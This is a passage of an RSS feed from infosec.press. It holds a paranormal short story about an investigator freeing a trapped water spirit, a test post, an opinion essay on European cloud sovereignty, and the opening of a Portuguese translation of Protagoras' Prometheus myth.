remorse and pity.&#xA;I headed toward the crowd, the illusion playing at the edges of my senses, eager to pull me back in coming in waves with a dull thump each time.&#xA;As I got closer, I saw them pointing out on the ice, laughing and hugging, pretending to drink mugs of coffee or cocoa that were real to them.&#xA;And the thumps got louder and louder.&#xA;In fact, the thumps were so loud they had to be real.&#xA;I looked over the ice, underneath the illusion of kids ice skating and throwing snowballs, underneath the sleds and snowmen.&#xA;I saw something under the ice.&#xA;A black mass moving and pushing up and failing to find a way out.&#xA;It was desperate, I could feel that now that I knew it was there.&#xA;I went out on the ice to the shouts of the others telling me to get off because I wasn&#39;t dressed for it, to stay out of the way, to be careful, to be nice to the kids.&#xA;I knelt down and felt the ice.&#xA;It wasn&#39;t cold.&#xA;I still had my toolkit. No axe, but a hammer and a flat-head screwdriver might do.&#xA;I started tapping, chiseling, then banging.&#xA;The others were angry now, yelling that I was putting their kids in danger, that if I wanted to fish I&#39;d have to wait until after the kids were done playing.&#xA;The &#34;ice&#34; chipped like old concrete until I had a hole big enough to stick a hand through, an arm.&#xA;It was only an inch thick.&#xA;I had no idea how it was even holding my weight.&#xA;The water was a syrupy but I waved my hand as much as I could until the black mass saw me and swam toward me.&#xA;The &#34;ice&#34; bulged up under its pressure but wouldn&#39;t break.&#xA;I pulled my arm out of the hole and pressed my ear to it instead.&#xA;&#34;Free me, please,&#34; whispered.&#xA;&#34;Free me, please,&#34; again and again.&#xA;Hope and fear in equal measure came from whatever it was.&#xA;At this point, I had an idea of what was down there and I hoped my hormones would keep me safe.&#xA;I hammered and hammered, hearing her voice from the water the whole time, hearing the people screaming, begging me to stop, but unwilling to come out on the ice.&#xA;Until it was a hole big enough for a person to climb out of, or be pulled into.&#xA;I put both arms in the slushy water and told her to come to me.&#xA;The black mass was already underneath and I felt its weight.&#xA;I felt its urgency and its hesitancy.&#xA;I felt it taste me, a tingle running through both arms all the way to my core.&#xA;It pulled slightly before reversing and allowing me to pull it up.&#xA;It resembled a horse, a bundle of wet grass, a pile of stones, a hag, a maiden, until it was simply a woman with green skin and seaweed for hair.&#xA;I&#39;d been so fascinated that I was able to see the transformations, the shifting, the refocusing of reality with my own eyes that I didn&#39;t hear the crowd&#39;s crying until it was over.&#xA;The water sprit pierced my soul with a glance, looking me up and down.&#xA;&#34;Hmmph!&#34; the green woman said, shaking her head.&#xA;&#34;Oh,&#34; I said, putting my right hand over my heart and raising my left hand in a symbol involving the first and second fingers as well as the pinky and thumb.&#xA;&#34;By the secret name inscribed on my soul, I release you from any and all obligations borne of this transaction.&#34;&#xA;That got her attention.&#xA;&#34;Thank you,&#34; she said reaching a trembling hand toward my face.&#xA;I did not pull away as she touched my cheek.&#xA;She had tropical lagoons for eyes, like a warm bath, like a mother&#39;s embrace.&#xA;It was another glamour, of course, but I allowed it, almost against my will.&#xA;Almost.&#xA;I was on a beach. The ocean&#39;s roar behind me like an out of tune radio.&#xA;She was in front of me, wearing a Tahitian pāreu, fragrant flowers in her thick, black hair, brown skin instead of green.&#xA;&#34;I&#39;m so tired of the snow and ice, so tired of Christmas,&#34; she said, looking up at the sky and squinting.&#xA;I heard music, singing, like a choir but it was just her laughing as she spun in place.&#xA;&#34;I&#39;m free!&#34; she sang.&#xA;&#34;You freed me.&#34;&#xA;She stopped spinning and faced me again.&#xA;She was getting closer but not walking.&#xA;&#34;Why did you reject your prize?&#34;&#xA;She was circling me but also still standing in front of me.&#xA;I felt her eyes all over me, I felt her probing me.&#xA;The sky turned to storm clouds.&#xA;I looked down, closed my eyes, to avoid her million eyes.&#xA;I answered, &#34;You tell me.&#xA;&#34;By now, you know me at least as well as I know myself.&#34;&#xA;The sun returned.&#xA;&#34;You aren&#39;t like the men and women I normally meet,&#34; she sang.&#xA;I felt the urge to lift my head, a gentle breeze stroking my chin.&#xA;&#34;Please look at me,&#34; she pleaded.&#xA;I took a deep breath, faced her, opened my eyes, and saw her.&#xA;She was beautiful, of course, like a live action Nani Pelekai?&#xA;My heart fluttered as if she was my first true love and heat flooded out to my hands and feet.&#xA;I wobbled, nauseated, like I might stumble or fall to my knees.&#xA;&#34;You do have a heart, after all,&#34; she sang, &#34;and I see how it beats.&#34;&#xA;I felt the warm breeze circling around my ankles, looked down, saw myself clearly for the first time.&#xA;I, too, was dressed in a bright pāreu, barefoot, dark skin.&#xA;Not my body.&#xA;I tested my muscles to see how real I was: toes, feet, calves, knees, thighs, pelvis, stomach.&#xA;Wait.&#xA;Something was different.&#xA;I went numb.&#xA;Something was different.&#xA;Impossible, but as real as my own flesh.&#xA;My hands trembled, stomach racked with nausea, my legs buckled, I was on the ground, sand in my mouth and eyes.&#xA;Tears, great torrents and I couldn’t stop crying.&#xA;I couldn’t stop.&#xA;I heard her fluttering toward me.&#xA;&#34;You refused my gift before I even offered.&#34;&#xA;She paused.&#xA;&#34;And it was because you thought you were doing me a favor.&#34;&#xA;She put a steadying hand on my naked shoulder.&#xA;&#34;That thing trapped me,&#34; she said.&#xA;&#34;It told me to give them their children back.&#xA;&#34;I didn&#39;t even take their children.&#34;&#xA;I heard her kneel down beside me.&#xA;I felt pity from her, pity but also longing.&#xA;I shivered at her breath in my ear.&#xA;&#34;But you rescued me.&#34;&#xA;I couldn&#39;t see her through my sobs.&#xA;I could barely hear her as I forced myself to remember this, to remember it.&#xA;The ocean was coming in. Not sure how I could tell, but it was coming in fast.&#xA;&#34;Thank you,&#34; she whispered, voice like an ice pick.&#xA;It was a phrase that carried power, when a fae speaks it is wise to consider that any words can be full of power and magic and gratitude, genuine gratitude, is powerful indeed.&#xA;Then I was lying on the false ice, lying in my own snot and tears, surrounded by grieving parents.&#xA;The sorrow, the emptiness, drove away whatever had been haunting the place. I could feel that almost immediately.&#xA;I carved some carefully designed sigils around at precise locations to help anchor against future resonance.&#xA;I went back out the same way I came in, hiked to my concealed vehicle, climbed inside, and cried for an hour.&#xA;I drove home in mute resignation of what I&#39;d been allowed to experience.&#xA;I left the personal details out of my full report, but they&#39;ve never left me.&#xA;And.&#xA;Sometimes.&#xA;When I dream.&#xA;Instead, I&#39;m back on that beach.&#xA;I look out at the ocean, at the eternal cycle of waves in and out; at the horizon in the unreachable distance.&#xA;I hear singing.&#xA;But.&#xA;This time.&#xA;It&#39;s just the birds.&#xA;I feel the sand between my toes, I smell the brine, the seaweed, fruit trees in the distance.&#xA;I feel the warmth of the sun that never sets, the breeze that meanders along the water line.&#xA;I sit in the surf, rubbing my belly, savoring every sensation, marveling at what I should not have.&#xA;Waiting for her to come back.&#xA;So I can tell her, &#34;thank you.&#34;&#xA;But she never will.&#xA;&#xA;---&#xA;&#xA;#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #Fiction #Paranormal ]]&gt;</description>
      <content:encoded><![CDATA[<p>I was sent to a psychiatric hospital experiencing a “haunting”.
It was one of those old school places that looks like a mansion out of a horror movie, a place that people spend a great deal of money to get access to.
As usual, I was handed a folder and USB drive full of research the investigative team had already completed.
This building had a series of unused sub-levels from the bad old days and an honest to god death tunnel.
The dead don&#39;t bother me so I snuck in through the external hatch, where they used to occasionally remove the bodies.
I&#39;ll skip the gory details if you don&#39;t mind and get right to setting up camp in the unused administrative office in the abandoned sub-level.
Ears aching, neck hairs standing up, gooseflesh, like a cold spark pulsing through the whole place.
I disguised myself as maintenance before grabbing my toolkit and heading up the stairs.
The drywall dust only served to make my appearance more convincing.
I did odd jobs around the place, listening, gathering intel.
Patients escaping their rooms was too common to narrow down, but talk of a frozen swimming pool pointed me in the right direction.
I had to be close.
Walking down a wide, empty hallway, I heard something <em>plink</em> and stopped.
“You dropped a button,” a husky voice said.
I looked down and saw, sure enough, a button on the linoleum behind me.
As I bent to pick it up, I got a look at the feet of the being who&#39;d spoken to me.
It was about an inch off the ground, barefooted, skin dry as stone and cragged, spotted with brown and gray.
My heart rate was steady, my breathing normal, I chuckled to myself.
“Thank you,” I said as I stood up and saw the whole thing.
It was morbidly obese, pale and dry as a porcelain doll, and stark naked. Fat hid any discernible sex.
Long white hair floated around its head like a bleached anemone. Eyes were yellow surrounded by black and the mouth was little more than a horizontal slash.
No smell other than ozone.
“I haven&#39;t seen you around,” I said.
“Oh?” it said. “I&#39;m new here.”
I held up the button.
“Thanks again, uh…Miss…ter?” I said, gazing expectantly.
“It&#39;s <em>Doctor</em>, actually,” it said, without moving its mouth, “Doctor Sharpe.”
“Thank you, <em>Doctor</em> Sharpe, then.”
I turned and started to walk away.
When you encounter an entity during a haunting, they typically want to be seen.
The theory is that they literally feed on your strong emotions, your reactions.
“Wait a moment,” it said in a softer tone.
“Yeah?” I didn&#39;t turn around.
“Would you—like to play a game with me?”
I grinned and I&#39;m sure it felt my elation.
“I thought you&#39;d never ask,” I said and turned back to face it.
There was a table in between us that hadn&#39;t been there.
“Nice,” I said, running my hand over its obsidian smooth surface.
The entity was standing on the other side, no longer a floating ball.
White hair hung down its oval face, wearing the same yellow eyes but with a delicate nose and pink lips around the mouth.
Broad shoulders were draped with a white gown more appropriate for a gothic sleepover.
She was smiling, shaking her cupped hands as something jingled inside.
“What&#39;s your name?” she asked, showing her yellow teeth this time.
“Anderson,” I said, giving her an alias.
“I don&#39;t think so,” she said, tilting her head, her hair fluttering briefly to life.
My ears tingled, and my hair ruffled just a little under my hat.
A breeze ran down my sides to my feet, up my calves and thighs, met in my crotch, ran up my torso, by my chest, then split and went down both arms.
She knew me now.
Whether she&#39;d be intrigued, confused, or angry remained to be seen.
“Ooh,” she said and that was all.
Coins clanged on the table as she opened her hands.
They were colored, shaped, and sized like American quarters but without the ridges.
“Take some,” she said.
“And keep your button out.”
I counted out four and slid them over in front of me.
Picking one up, I glanced over, “May I?”
Her yellow teeth smiled back as she nodded.
Dense, heavy in my fingers, like real metal.
Looked like cuneiform writing and instead of George Washington and an eagle, it was something like a lamprey&#39;s mouth on one side and a burning bush on the other.
“You can see?” she asked, squinting.
“Yeah,” I said. “A real beauty.”
And it&#39;s true. I&#39;ve seen lots of manifestations and this one was extremely detailed and surprisingly solid.
In other words, this place was very, very tangled with the other.
I stacked the coins in front of me and put the button beside.
“So, Doctor Sharpe,” I asked. “What are the rules?”
Her hair twitched.
“Please call me Amelia,” she replied.
“Okay, Amelia,” I said. “Then you can call me Alex.”
She leaned in, asking, “Is that short for something.” While her hair started to writhe.
“Maybe,” I told her, visibly grinning.
I can play games, too. Sometimes, they like that.
She leaned back and I felt nothing but anticipation from her.
“You&#39;ve already stacked the coins, I see.
“Put your button on top of them.”
I did as I was instructed.
When I looked over at hers, the table had a mock temple made of old cardboard tubes from toilet paper and paper towels.
I blinked a few times and it was still there.
Another thing about hauntings.
Even though we are tangled with another reality, there are still some things we aren&#39;t able to see.
Our brains can&#39;t interpret it.
As a safety mechanism, it&#39;ll hide things from us until they can happen when we aren&#39;t looking.
When you look away, when you turn your back, when you blink your eyes, then your brain lets you see the change.
You couldn’t see it happen. That&#39;s not possible.
So I blinked to make sure she was done modifying the table.
“You can go first, Alex,” she said.
“You have to use your finger to flick the button at the temple.
“The goal is to be the first person to knock it down.”
The button on her stack of coins glinted when I tilted my head.
“That hardly seems fair,” I said.
“What would you prefer?” she asked.
I looked down and saw my coins and button were replaced with food.
I looked up and the temple and everything was now desserts.
“First one to finish <em>eating</em> the temple?”
I picked up one of the pastries and took a bite.
Flaky, honey sweet, hint of pecan, powdered sugar on top.
“Extremely good job on these,” I said.
“They taste freshly baked.”
“I&#39;m glad you like them,” she replied, the table now covered in sweets of all kinds.
Instead of eating more, I put it down.
When they give you food, you have no idea what you are actually eating.
You really don&#39;t want to know some of the things I&#39;ve put in my mouth.
She frowned, bunching up her bottom lip.
Frustration.
“I thought you wanted to play?” she said.
“Actually, I&#39;m down here because I heard about a frozen swimming pool.
“Was that you?”
Her hair danced.
“They really seem to like it,” she said.
“I&#39;d like to see it, too, if that&#39;s okay.”
She pointed beside us.
“It&#39;s right there.”
And it was.
An Olympic sized swimming pool, frozen solid.
I could see people at the far end.
There was a faint impression of ice skaters, of Christmas trees, of carolers singing.
“Christmas,” I said.
I felt myself slipping into it, could smell hot cocoa and cookies, could feel a fireplace nearby.
“It is lovely,” I said before shaking myself out of the reverie.
“I cannot image how much effort that must have been to create for them.”
Her face was stoic, stern, but her yellow eyes were moist, red tears welled.
“They deserve it,” is all she said before she and her entire table slid into the floor and vanished.
I hadn&#39;t felt malice or mischief, only remorse and pity.
I headed toward the crowd, the illusion playing at the edges of my senses, eager to pull me back in coming in waves with a dull thump each time.
As I got closer, I saw them pointing out on the ice, laughing and hugging, pretending to drink mugs of coffee or cocoa that were real to them.
And the thumps got louder and louder.
In fact, the thumps were so loud they had to be real.
I looked over the ice, underneath the illusion of kids ice skating and throwing snowballs, underneath the sleds and snowmen.
I saw something under the ice.
A black mass moving and pushing up and failing to find a way out.
It was desperate, I could feel that now that I knew it was there.
I went out on the ice to the shouts of the others telling me to get off because I wasn&#39;t dressed for it, to stay out of the way, to be careful, to be nice to the kids.
I knelt down and felt the ice.
It wasn&#39;t cold.
I still had my toolkit. No axe, but a hammer and a flat-head screwdriver might do.
I started tapping, chiseling, then banging.
The others were angry now, yelling that I was putting their kids in danger, that if I wanted to fish I&#39;d have to wait until after the kids were done playing.
The “ice” chipped like old concrete until I had a hole big enough to stick a hand through, an arm.
It was only an inch thick.
I had no idea how it was even holding my weight.
The water was a syrupy but I waved my hand as much as I could until the black mass saw me and swam toward me.
The “ice” bulged up under its pressure but wouldn&#39;t break.
I pulled my arm out of the hole and pressed my ear to it instead.
“Free me, please,” whispered.
“Free me, please,” again and again.
Hope and fear in equal measure came from whatever it was.
At this point, I had an idea of what was down there and I hoped my hormones would keep me safe.
I hammered and hammered, hearing her voice from the water the whole time, hearing the people screaming, begging me to stop, but unwilling to come out on the ice.
Until it was a hole big enough for a person to climb out of, or be pulled into.
I put both arms in the slushy water and told her to come to me.
The black mass was already underneath and I felt its weight.
I felt its urgency and its hesitancy.
I felt it taste me, a tingle running through both arms all the way to my core.
It pulled slightly before reversing and allowing me to pull it up.
It resembled a horse, a bundle of wet grass, a pile of stones, a hag, a maiden, until it was simply a woman with green skin and seaweed for hair.
I&#39;d been so fascinated that I was able to see the transformations, the shifting, the refocusing of reality with my own eyes that I didn&#39;t hear the crowd&#39;s crying until it was over.
The water sprit pierced my soul with a glance, looking me up and down.
“Hmmph!” the green woman said, shaking her head.
“Oh,” I said, putting my right hand over my heart and raising my left hand in a symbol involving the first and second fingers as well as the pinky and thumb.
“By the secret name inscribed on my soul, I release you from any and all obligations borne of this transaction.”
That got her attention.
“Thank you,” she said reaching a trembling hand toward my face.
I did not pull away as she touched my cheek.
She had tropical lagoons for eyes, like a warm bath, like a mother&#39;s embrace.
It was another glamour, of course, but I allowed it, almost against my will.
Almost.
I was on a beach. The ocean&#39;s roar behind me like an out of tune radio.
She was in front of me, wearing a Tahitian <em>pāreu</em>, fragrant flowers in her thick, black hair, brown skin instead of green.
“I&#39;m so tired of the snow and ice, so tired of Christmas,” she said, looking up at the sky and squinting.
I heard music, singing, like a choir but it was just her laughing as she spun in place.
“I&#39;m free!” she sang.
“You freed me.”
She stopped spinning and faced me again.
She was getting closer but not walking.
“Why did you reject your prize?”
She was circling me but also still standing in front of me.
I felt her eyes all over me, I felt her probing me.
The sky turned to storm clouds.
I looked down, closed my eyes, to avoid her million eyes.
I answered, “You tell me.
“By now, you know me at least as well as I know myself.”
The sun returned.
“You aren&#39;t like the men and women I normally meet,” she sang.
I felt the urge to lift my head, a gentle breeze stroking my chin.
“Please look at me,” she pleaded.
I took a deep breath, faced her, opened my eyes, and saw her.
She was beautiful, of course, like a live action Nani Pelekai?
My heart fluttered as if she was my first true love and heat flooded out to my hands and feet.
I wobbled, nauseated, like I might stumble or fall to my knees.
“You do have a heart, after all,” she sang, “and I see how it beats.”
I felt the warm breeze circling around my ankles, looked down, saw myself clearly for the first time.
I, too, was dressed in a bright <em>pāreu</em>, barefoot, dark skin.
Not my body.
I tested my muscles to see how real I was: toes, feet, calves, knees, thighs, pelvis, stomach.
Wait.
Something was different.
I went numb.
Something <strong>was</strong> different.
Impossible, but as real as my own flesh.
My hands trembled, stomach racked with nausea, my legs buckled, I was on the ground, sand in my mouth and eyes.
Tears, great torrents and I couldn’t stop crying.
I couldn’t stop.
I heard her fluttering toward me.
“You refused my gift before I even offered.”
She paused.
“And it was because you thought <em>you were doing me a favor</em>.”
She put a steadying hand on my naked shoulder.
“That thing trapped me,” she said.
“It told me to give them their children back.
“I didn&#39;t even take their children.”
I heard her kneel down beside me.
I felt pity from her, pity but also longing.
I shivered at her breath in my ear.
“But you rescued me.”
I couldn&#39;t see her through my sobs.
I could barely hear her as I forced myself to remember this, to remember it.
The ocean was coming in. Not sure how I could tell, but it was coming in fast.
“Thank you,” she whispered, voice like an ice pick.
It was a phrase that carried power, when a fae speaks it is wise to consider that any words can be full of power and magic and gratitude, genuine gratitude, is powerful indeed.
Then I was lying on the false ice, lying in my own snot and tears, surrounded by grieving parents.
The sorrow, the emptiness, drove away whatever had been haunting the place. I could feel that almost immediately.
I carved some carefully designed sigils around at precise locations to help anchor against future resonance.
I went back out the same way I came in, hiked to my concealed vehicle, climbed inside, and cried for an hour.
I drove home in mute resignation of what I&#39;d been allowed to experience.
I left the personal details out of my full report, but they&#39;ve never left me.
And.
Sometimes.
When I dream.
Instead, I&#39;m back on that beach.
I look out at the ocean, at the eternal cycle of waves in and out; at the horizon in the unreachable distance.
I hear singing.
But.
This time.
It&#39;s just the birds.
I feel the sand between my toes, I smell the brine, the seaweed, fruit trees in the distance.
I feel the warmth of the sun that never sets, the breeze that meanders along the water line.
I sit in the surf, rubbing my belly, savoring every sensation, marveling at what I should not have.
Waiting for her to come back.
So I can tell her, “thank you.”
But she never will.</p>

<hr>

<p>#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #Fiction #Paranormal</p>
]]></content:encoded>
      <author>J. R. DePriest</author>
      <guid>https://infosec.press/read/a/ouiq2ohiap</guid>
      <pubDate>Sun, 06 Apr 2025 20:31:37 +0000</pubDate>
    </item>
    <item>
      <title>Hello world!</title>
      <link>https://infosec.press/kr3st3n/hello-world-dzx0</link>
      <description>&lt;![CDATA[Hello world!&#xA;&#xA;I write this as a test to see what’s possible on infosec.press. &#xA;&#xA;Can I use markdown? Yes I can!&#xA;&#xA;Did the use of my browsers ‘back’ button spawn a new post instead of an edit? I think it did. ]]&gt;</description>
      <content:encoded><![CDATA[<p>Hello world!</p>

<p>I write this as a test to see what’s possible on infosec.press.</p>

<p>Can I use <em>markdown</em>? Yes I <strong>can</strong>!</p>

<p>Did the use of my browsers ‘back’ button spawn a new post instead of an edit? I think it did.</p>
]]></content:encoded>
      <author>YAIL</author>
      <guid>https://infosec.press/read/a/5guyolar91</guid>
      <pubDate>Sat, 22 Mar 2025 19:00:00 +0000</pubDate>
    </item>
    <item>
      <title>19. Who Controls? Thoughts on Cloud Sovereignty</title>
      <link>https://infosec.press/jaythvv/19</link>
      <description>&lt;![CDATA[The agreements on data sharing between the EU and the US have been problematic from the start, due to irreconcilable difference in privacy principles. From Safe Harbor to Privacy Shield(s), each time it was clear that any agreement would be challenged. In the meantime, the world moved on regardless.&#xA;&#xA;The debate flares up now, again, because of the fast-changing relationship  between the US and Europe, following the first months of a chaotic Trump presidency that is re-defining global alliances. But a lot of the discussion is emotional and imprecise. I am as concerned about security and privacy for private citizens as the next one. But that shouldn&#39;t jump to wild claims that the US government can just get at anyone&#39;s data or cut them off.&#xA;&#xA;Not All Cloud is the Same&#xA;&#xA;When we&#39;re talking about American cloud services, are we talking Google Search and Gmail , Office 365, Facebook, WhatsApp, or Twitter/X? Or are we talking about cloud infrastructure and services like AWS, Azure, Google Cloud? In the first, you don&#39;t pay, have no control, and trade your privacy for convenience. In the latter, you orchestrate all your compute, network and storage services, and have access to encryption services of varying strengths. Services like AWS Nitro are specifically designed to guarantee AWS administrators can&#39;t access their customers&#39; workloads, and Sovereign Cloud offerings take this further and further.&#xA;&#xA;The debate of privacy of citizens - that is, move to Signal or Fediverse services - is not the same as the debate of European corporate and governmental use of American cloud infrastructure providers. The arguments against Google&#39;s and Meta&#39;s dominance in retail internet service and advertisement are not new, or suddenly more problematic with the change in US Administrations. Similarly, cloud infrastructure services are not suddenly at greater risk.&#xA;&#xA;Residence or Remote Control?&#xA;&#xA;We talk about EU-only access and data residency, but we forget what is really important about that. If Microsoft can access a server in Europe from America, what use is EU data residency? With strong encryption, the physical location of data on disk doesn&#39;t really matter. If the American provider doesn&#39;t have access to the key, the European data owner still controls the data. &#xA;&#xA;Meanwhile, the physical equipment and data centers are still in Europe, operated be local residents and subject to local jurisdictions. When Russian sanctions came in, many global technology companies retreated under realistic threat of their facilities being nationalized or &#34;sold&#34; to a local operator. That is an extreme example, but EU governments are not powerless. &#xA;&#xA;The moment the legal status of American cloud infrastructure providers becomes a real problem, immediately you see the foundation of AWS, Europe, Azure Europe and Google Cloud Europe as independent, European corporations. &#xA;&#xA;Can Open Source Save Europe?&#xA;&#xA;Maybe. But not on its own. The top 7 (or 6, if you count Github as Microsoft) corporate contributors are American tech corporations until you get to SAP, and open source software is used equally on both sides of the Atlantic for cloud services. &#xA;&#xA;Does the open source have to be European for independence? Who cares where it comes from? Fork open source projects you rely on, if necessary. Cloud services based on open source are not inherently more secure, private and independent. They still need to be operated by someone. And often the American cloud providers rent from local data center operators.&#xA;&#xA;Lack of Capital, Fragmented Market&#xA;&#xA;The problem of Europe and cloud independence is the lack of capital. While there are 4-5 American global cloud infrastructure providers, there isn&#39;t a single one that can claim that from Europe. The market is fragmented with national and regional providers. &#xA;&#xA;Initiatives like IPCEI CIS are interesting, but would still create an odd cloud where services would be provided by a wide variety of different supplier, greater complexity, and lower economies of scale. It&#39;s a noble pursuit, but a political one. &#xA;&#xA;Technological Interdependence&#xA;&#xA;We focus on European dependence on America... but we fail to do the same in reverse. There is more competition in cloud infrastructure and services than there is in semiconductor design (Arm Holdings, UK) and photolithography (ASML, NL) or the business application software that runs the global economy and government services (SAP, D). &#xA;&#xA;Serious Times&#xA;&#xA;That is not to say there isn&#39;t a problem. We live in strange times, and will have to rethink our threat models. But for the debate to be productive, we need to be nuanced what the real problems are. And not let ourselves be ruled by broad strokes and emotions. ]]&gt;</description>
      <content:encoded><![CDATA[<p>The agreements on data sharing between the EU and the US have been problematic from the start, due to irreconcilable difference in privacy principles. From Safe Harbor to Privacy Shield(s), each time it was clear that any agreement would be challenged. In the meantime, the world moved on regardless.</p>

<p>The debate flares up now, again, because of the fast-changing relationship  between the US and Europe, following the first months of a chaotic Trump presidency that is re-defining global alliances. But a lot of the discussion is emotional and imprecise. I am as concerned about security and privacy for private citizens as the next one. But that shouldn&#39;t jump to wild claims that the US government can just get at anyone&#39;s data or cut them off.</p>

<h2 id="not-all-cloud-is-the-same">Not All Cloud is the Same</h2>

<p>When we&#39;re talking about American cloud services, are we talking Google Search and Gmail , Office 365, Facebook, WhatsApp, or Twitter/X? Or are we talking about cloud infrastructure and services like AWS, Azure, Google Cloud? In the first, you don&#39;t pay, have no control, and trade your privacy for convenience. In the latter, you orchestrate all your compute, network and storage services, and have access to encryption services of varying strengths. Services like <a href="https://aws.amazon.com/ec2/nitro/" rel="nofollow">AWS Nitro</a> are specifically designed to guarantee AWS administrators can&#39;t access their customers&#39; workloads, and Sovereign Cloud offerings take this further and further.</p>

<p>The debate of privacy of citizens – that is, move to Signal or Fediverse services – is not the same as the debate of European corporate and governmental use of American cloud infrastructure providers. The arguments against Google&#39;s and Meta&#39;s dominance in retail internet service and advertisement are not new, or suddenly more problematic with the change in US Administrations. Similarly, cloud infrastructure services are not suddenly at greater risk.</p>

<h2 id="residence-or-remote-control">Residence or Remote Control?</h2>

<p>We talk about EU-only access and data residency, but we forget what is really important about that. If Microsoft can access a server in Europe from America, what use is EU data residency? With strong encryption, the physical location of data on disk doesn&#39;t really matter. If the American provider doesn&#39;t have access to the key, the European data owner still controls the data.</p>

<p>Meanwhile, the physical equipment and data centers are still in Europe, operated be local residents and subject to local jurisdictions. When Russian sanctions came in, many global technology companies retreated under realistic threat of their facilities being nationalized or “sold” to a local operator. That is an extreme example, but EU governments are not <em>powerless</em>.</p>

<p>The moment the legal status of American cloud infrastructure providers becomes a real problem, immediately you see the foundation of AWS, Europe, Azure Europe and Google Cloud Europe as independent, European corporations.</p>

<h2 id="can-open-source-save-europe">Can Open Source Save Europe?</h2>

<p>Maybe. But not on its own. The top 7 (or 6, if you count Github as Microsoft) corporate contributors are American tech corporations until you get to SAP, and open source software is used equally on both sides of the Atlantic for cloud services.</p>

<p>Does the open source have to be European for independence? Who cares where it comes from? Fork open source projects you rely on, if necessary. Cloud services based on open source are not inherently more secure, private and independent. They still need to be operated by someone. And often the American cloud providers rent from local data center operators.</p>

<h2 id="lack-of-capital-fragmented-market">Lack of Capital, Fragmented Market</h2>

<p>The problem of Europe and cloud independence is the lack of capital. While there are 4-5 American global cloud infrastructure providers, there isn&#39;t a single one that can claim that from Europe. The market is fragmented with national and regional providers.</p>

<p>Initiatives like <a href="https://competition-policy.ec.europa.eu/state-aid/ipcei/approved-ipceis/cloud_en" rel="nofollow">IPCEI CIS</a> are interesting, but would still create an odd cloud where services would be provided by a wide variety of different supplier, greater complexity, and lower economies of scale. It&#39;s a noble pursuit, but a political one.</p>

<h2 id="technological-interdependence">Technological Interdependence</h2>

<p>We focus on European dependence on America... but we fail to do the same in reverse. There is more competition in cloud infrastructure and services than there is in semiconductor design (Arm Holdings, UK) and photolithography (ASML, NL) or the business application software that runs the global economy and government services (SAP, D).</p>

<h2 id="serious-times">Serious Times</h2>

<p>That is not to say there isn&#39;t a problem. We live in strange times, and will have to rethink our threat models. But for the debate to be productive, we need to be nuanced what the real problems are. And not let ourselves be ruled by broad strokes and emotions.</p>
]]></content:encoded>
      <author>Hyperscale Security</author>
      <guid>https://infosec.press/read/a/vt1rfe5n7y</guid>
      <pubDate>Sun, 09 Mar 2025 18:03:20 +0000</pubDate>
    </item>
    <item>
      <title>Protágoras: mito de Prometeu e Epimeteu</title>
      <link>https://infosec.press/sirius/protagoras-mito-de-prometeu-e-epimeteu-mjk3</link>
      <description>&lt;![CDATA[Prometheus&#xA;!--more--&#xA;&#xA;Dando seguimento ao meu projeto de retomada de Protágoras, com algumas considerações bem informais entendo ser interessante disponibilizar uma boa tradução do mito do mais famoso sofista.&#xA;&#xA;É possível observar uma forte ligação do mito de Prometeu e Epimeteu com as concepções naturalistas da história dos primeiros homens de Diodoro Sículo, atribuído a Demócrito.&#xA;&#xA;A presente tradução do mito de prometeu foi extraída de outra em inglês, por James A. Arieti e Roger M. Barrus, na obra &#34;Plato&#39;s Protagoras&#34;. Mantive algumas das notas de rodapé do original, que considerei bem interessantes, pouco acrescentei à algumas notas, mas recomendo a leitura do texto original pois há mais notas que tornam a leitura ainda mais interessante.&#xA;&#xA;Nesse diálogo, Sócrates é acordado pelo jovem Hipócrates (filho de Apolodoro) que vem bater à porta de sua casa para avisar que Protágoras está em Atenas, na casa de Hipponicus, filho de Calias.&#xA;&#xA;Ao chegarem na residência, encontram o local repleto de sofistas e discipulos. Sócrates então começa a debater com Protágoras e seu primeiro questionamento é sobre a possibilidade de a excelência (arete) ser ensinada, uma vez que Protágoras era pago como professor de tal matéria.&#xA;&#xA;Protágoras utiliza o mito como uma alegoria para demonstrar que a excelência pode ser ensinada e prossegue discursando sobre outro questionamento de Sócrates sobre bons homens não conseguirem ensinar seus filhos a também serem virtuosos.&#xA;&#xA;Muitas das ideias inovadoras no pensamento político filosófico que estão nessa alegoria, suas ideias humanistas, democráticas, juspositivistas e sociológicas, vou abordar mais detalhadamente em outros escritos.&#xA;&#xA;Segue por enquanto o trecho.&#xA;&#xA;O Mito de Prometeu &#xA;(Protágoras, no diálogo homônimo de Platão)&#xA;&#xA;Era uma vez, como você vê, havia deuses, mas não havia gêneros mortais. [320d] Mas quando também para esses [gêneros] chegou o tempo [que foi] ordenado para [seu] processo de vir a ser, os deuses os moldaram dentro da terra [ao] misturá-los com terra e fogo e todas as coisas misturadas com fogo e terra. E quando os [deuses] estavam prestes a trazer esses [seres] à luz, designaram Prometeu e Epimeteusupa id=&#34;fnr.1&#34; class=&#34;footref&#34; href=&#34;#fn.1&#34; name=&#34;fnr.1&#34;1/a/sup para organizar e distribuir poderes para cada [um dos gêneros mortais] conforme apropriado. E Epimeteu pede a Prometeu [que lhe conceda o favor de] fazer a distribuição. &#39;Mas, [você] supervisionará minha distribuição&#39;, ele disse. E, tendo assim persuadido [Prometeu], ele faz a distribuição. [320e] E ao fazer a distribuição, a alguns ele atribuiu força sem rapidez, mas organizou os mais fracos com rapidez; a outros ele armou, mas ao dar a outros uma natureza desarmada, ele concebeu para eles algum outro poder para sua segurança. Como você vê, para aqueles seres que ele vestiu com pequenez, ele distribuiu uma fuga alada ou o hábito de habitar no subsolo; aqueles que ele aumentou em tamanho, ele salvou por meio desse [tamanho]; [321a] e igualando outras coisas dessa forma, ele continuou a fazer a distribuição. E ele concebeu essas coisas, sendo cauteloso para que nenhum gênero desaparecesse da vista.&#xA;&#xA;E quando ele os havia provido de um meio de escapar de destruições mútuas, ele concebeu um conforto para as estações [que vêm] de Zeus, vestindo-os com espessa pelagem e peles sólidas, suficientes para afastar o inverno e até capazes [de afastar] o calor, e para esses [animais], enquanto vão para suas camas [Epimeteu concebeu] que pudessem possuir seus próprios colchões caseiros, [321b] colocando alguns sob suas armas, mas providenciando a outros peles espessas e sem sanguesupa id=&#34;fnr.2&#34; class=&#34;footref&#34; href=&#34;#fn.2&#34; name=&#34;fnr.2&#34;2/a/sup.&#xA;&#xA;Então, ele distribuiu 